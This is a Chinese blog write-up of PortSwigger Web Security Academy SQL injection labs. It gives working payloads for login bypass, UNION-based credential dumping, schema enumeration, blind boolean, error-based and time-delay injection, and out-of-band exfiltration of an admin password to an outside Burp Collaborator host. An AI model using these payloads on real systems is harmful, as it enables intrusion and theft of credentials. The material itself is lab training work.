Portswigger-web-security-academy：sql injection

zoukankan html css js c++ java

Portswigger-web-security-academy：sql injection
sql injection
目录
sql injection
SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
SQL injection vulnerability allowing login bypass
SQL injection UNION attack, determining the number of columns returned by the query
SQL injection UNION attack, finding a column containing text
SQL injection UNION attack, retrieving data from other tables
SQL injection UNION attack, retrieving multiple values in a single column
SQL injection attack, querying the database type and version on Oracle
SQL injection attack, querying the database type and version on MySQL and Microsoft
SQL injection attack, listing the database contents on non-Oracle databases
SQL injection attack, listing the database contents on Oracle
Blind SQL injection with conditional responses
Blind SQL injection with conditional errors
Blind SQL injection with time delays
Blind SQL injection with time delays and information retrieval
Blind SQL injection with out-of-band interaction
Blind SQL injection with out-of-band data exfiltration
SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- 题目描述
  
  在产品类别处可以sql注入，sql语句：SELECT * FROM products WHERE category = 'Gifts' AND released = 1
  
  要求显示所有产品的信息
- 解题过程
  
  /filter?category=' or 1=1 --
SQL injection vulnerability allowing login bypass
- 题目描述
  
  登录的sql语句：SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
  
  要求登录administrator账号
- 解题过程
  
  account：administrator' --
  
  password：asd
SQL injection UNION attack, determining the number of columns returned by the query
- 题目描述
  
  产品类别过滤器可以sql注入
  
  要求使用union返回一个额外的空行
  
  （爆字段数）
- 解题过程
  
  /filter?category=' union select null,null,null --
SQL injection UNION attack, finding a column containing text
- 题目描述
  
  产品类别过滤器可以sql注入
  
  要求使用union返回额外的一行数据
  
  （爆回显位）
- 解题过程
  
  爆字段数
  
  /filter?category=' order by 3 -- 测出来是3
  
  爆回显位
  
  /filter?category=' union select null,'asd',null --测出来是第二位
  
  把asd换成页面标题里给的字符串，然后访问
SQL injection UNION attack, retrieving data from other tables
- 题目描述
  
  产品类别过滤器可以sql注入
  
  数据库里有users表，包含字段username和password
  
  要求拿到administrator的账号去登录
- 解题过程
  
  爆字段数
  
  /filter?category=' union select null,null --
  
  爆回显位
  
  /filter?category=' union select '1','2' --
  
  爆数据
  
  /filter?category=' union select concat(username),concat(password) from users --
  
  用administratord的号去登录
SQL injection UNION attack, retrieving multiple values in a single column
- 题目描述
  
  产品类别过滤器可以sql注入
  
  数据库里有users表，包含字段username和password
  
  要求拿到administrator的账号去登录
- 解题过程
  
  爆字段数
  
  /filter?category=' union select null,null --
  
  爆回显位
  
  /filter?category=' union select null,'asd' --
  
  爆数据
  
  /filter?category=' union select null,password from users --
  
  一共也就仨密码，都试一遍
SQL injection attack, querying the database type and version on Oracle
- 题目描述
  
  产品类别过滤器可以sql注入
  
  要求爆出数据库版本
- 解题过程
  
  题目说了是Oracle数据库，所以自定义数据的后边要加上表from dual
  
  还是先爆字段数和回显位
  
  /filter?category=' union select null,'asd' from dual --
  
  爆数据
  
  /filter?category=' union select null,banner from v$version --
SQL injection attack, querying the database type and version on MySQL and Microsoft
- 题目描述
  
  和上一题一样，把Oracle换成了MySQL和Microsoft
  
  要求爆出数据库版本
- 解题过程
  
  爆字段数和回显位
  
  /filter?category=' union select 'asd','asd' --
  
  爆数据
  
  /filter?category=' union select @@version,'asd' --
SQL injection attack, listing the database contents on non-Oracle databases
- 题目描述
  
  产品类别过滤器可以sql注入
  
  要求使用administrator的账号登录
- 解题过程
  
  爆字段数和回显位
  
  /filter?category=' union select 'asd','asd' --
  
  爆数据库名
  
  /filter?category=' union select null,concat(shema_name) from information_schema.schemata --
  
  爆表名
  
  /filter?category=' union select null,concat(table_name) from information_schema.tables where table_schema='public'--
  
  爆字段名
  
  /filter?category=' union select null,concat(column_name) from information_schema.columns where table_name ='user_xxxx' --
  
  爆数据
  
  /filter?category=' union select usename_xxxx,password_xxxx from user_xxx --
SQL injection attack, listing the database contents on Oracle
- 题目描述
  
  和上道题一样，只是数据库换成了Oracle
  
  要求使用administrator登录
- 解题过程
  
  爆字段数和回显位
  
  /filter?category=' union select 'asd','asd' --
  
  爆表名
  
  /filter?category=' union select null,table_name from all_tables --
  
  爆字段名
  
  /filter?category=' union select null,column_name from all_tab_columns where table_name ='user_xxx'--
  
  爆数据
  
  /filter?category=' union select USERNAME_xxx,PASSWORD_xxx from USERS_xxx --
Blind SQL injection with conditional responses
- 题目描述
  
  这道题可以sql盲注，应用使用了追踪cookie来分析访问数据，并且使用cookie进行了sql查询
  
  数据库有张users表，里面有username和password字段
  
  要求使用administrator登录
- 解题过程
  
  测试发现正常情况下页面会有welcome back，错误时没有
  
  爆密码长度
  
  TrackingId=0NgJWbCq47MjBGsQ' and (select length(password) from users where username='administrator')=§1§ --
  
  丢给intruder跑，最后筛选出含有Welcome back的请求，最终密码长度跑出来是20
  
  爆密码
  
  TrackingId=0NgJWbCq47MjBGsQ' and substr((select password from users where username='administrator'),§1§,1)='§a§'
  
  还是筛选出有welcome back的请求，然后按下一题的处理方法处理就行（我先写的下一题）
Blind SQL injection with conditional errors
- 题目描述
  
  上道题的升级版
  
  数据库有张users表，里面有username和password字段
  
  要求使用administrator登录
- 解题过程
  
  用burp抓包，repeater改cookie，测出字段数是1
  
  ' unoin select 'asd' --会报错，猜测可能是oracle
  
  'union select 'asd' from dual --页面正常，验证猜测
  
  不知道为什么if(x,x,x)表达式用不了，只能用select case when (s1) then s2 else s3 end from dual --
  
  爆密码长度
  
  ' union select case when((select length(password) from users where username='administrator')=1) then to_char(1/0) else null end from dual --
  
  测出来密码长度为20
  
  爆密码
  
  用intruder的cluster bomb模式，数字设为1-20，字母用brute forcer
  
  union select case when (substr((select password from users where username='administraror'),$1$,1)='$a$') then to_char(1/0) else null end from dual --
  
  最后把状态码为500的按顺序提取出来就行
  
  提取密码
  
  把状态码为500的全部选中复制
  
  粘贴到excel中，按1-20进行升序排序，赋值payload
  
  把payload复制，粘贴到txt中，然后手动去掉换行
  
  或者，cmd -> python
  
  s='''粘贴'''
  
  s.replace(' ','')
  
  当然手写python脚本是最方便的
Blind SQL injection with time delays
- 题目描述
  
  延时注入，注入点还是在cookie
  
  要求延时10秒
- 解题过程
  
  尝试了几种数据库的延时注入的payload都没有用，丢给sqlmap跑了一下也跑不出来
  
  有点奇怪，看了solution，给的payload是|| pg_sleep(10) --，= = 我试过|| pg_sleep(10)，但是没得用
  
  这里是堆叠注入，但是为啥能堆叠不能union呢
  
  想不通为啥，有师傅知道的话希望能点拨一下
Blind SQL injection with time delays and information retrieval
- 题目描述
  
  上一题的升级版
  
  数据库有张users表，里面有username和password字段
  
  要求使用administrator登录
- 解题过程
  
  爆password长度
  
  '%3b select case when((select length(password) from users where username='administrator')=1) then pg_sleep(10) else null end --（因为代理有几百毫秒的延迟，所以我设置的是10s，可以根据网络状况缩短）
  
  爆password
  
  %3b select case when(substr((select password from users where username='administrator'),1,1)='a') then pg_sleep(10) else null end --
  
  爆破方法和前面的题一样，根据Response received筛选
Blind SQL injection with out-of-band interaction
- 题目描述
  
  out-of-band是信息外带漏洞，核心思想是通过低权限的传输方式来窃取数据。贴一篇介绍：
  
  （中文版） https://www.freebuf.com/articles/database/183997.html
  
  （英文版）https://www.notsosecure.com/oob-exploitation-cheatsheet/
  
  要求通过sql注入，完成一次DNS查询
- 解题过程
  
  用Burp生成一个Burp Callaborator的链接，构造payload：
  
  '%3b copy (SELECT 'asd') to program 'nslookup 6ip1x1l2cn0xzunhypukgbj61x7nvc.burpcollaborator.net' --
  
  没起作用，怕是又换了数据库。。。而且没有交互的sql查询也查不出数据库信息，只能挨着试一下
  
  试出来是Oracle
  
  ' union SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://txuoco0prafkeh24dc97vyytgkmca1.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual --
  
  需要urlencode一下
  
  '%20union%20SELECT%20extractvalue%28xmltype%28%27%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%20%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//txuoco0prafkeh24dc97vyytgkmca1.burpcollaborator.net/%22%3E%20%25remote%3B%5D%3E%27%29%2C%27/l%27%29%20FROM%20dual%20--
Blind SQL injection with out-of-band data exfiltration
- 题目描述
  
  上一题的升级版，要求用OOB拿到administrator的密码并登录
- 解题过程
  
  看不出数据库类型，猜测跟上一题一样（猜对了
  
  ' union SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(select password from users where username='administrator')||'.chxskkwstibqfras48jloj2au10rog.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual --+
  
  还是要url编码一下
  
  ' union SELECT%20extractvalue%28xmltype%28%27%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%20%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//%27%7C%7C%28select%20password%20from%20users%20where%20username%3D%27administrator%27%29%7C%7C%27.chxskkwstibqfras48jloj2au10rog.burpcollaborator.net/%22%3E%20%25remote%3B%5D%3E%27%29%2C%27/l%27%29%20FROM%20dual --+
查看全文

相关阅读:
div+css清除浮动代码
 JavaScript for循环实现表格隔行变色
 JavaScript 四种显示数据方式
 table表格隔行变色
 table表格用tbody新属性获取DOM元素
 条形图
 子图--面向对象
 线的形状
 matplotlib--直线和点
 颜色和样式字符串

原文地址：https://www.cnblogs.com/R3col/p/13054547.html

Portswigger-web-security-academy：sql injection

sql injection

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

SQL injection vulnerability allowing login bypass

SQL injection UNION attack, determining the number of columns returned by the query

SQL injection UNION attack, finding a column containing text

SQL injection UNION attack, retrieving data from other tables

SQL injection UNION attack, retrieving multiple values in a single column

SQL injection attack, querying the database type and version on Oracle

SQL injection attack, querying the database type and version on MySQL and Microsoft

SQL injection attack, listing the database contents on non-Oracle databases

SQL injection attack, listing the database contents on Oracle

Blind SQL injection with conditional responses

Blind SQL injection with conditional errors

Blind SQL injection with time delays

Blind SQL injection with time delays and information retrieval

Blind SQL injection with out-of-band interaction

Blind SQL injection with out-of-band data exfiltration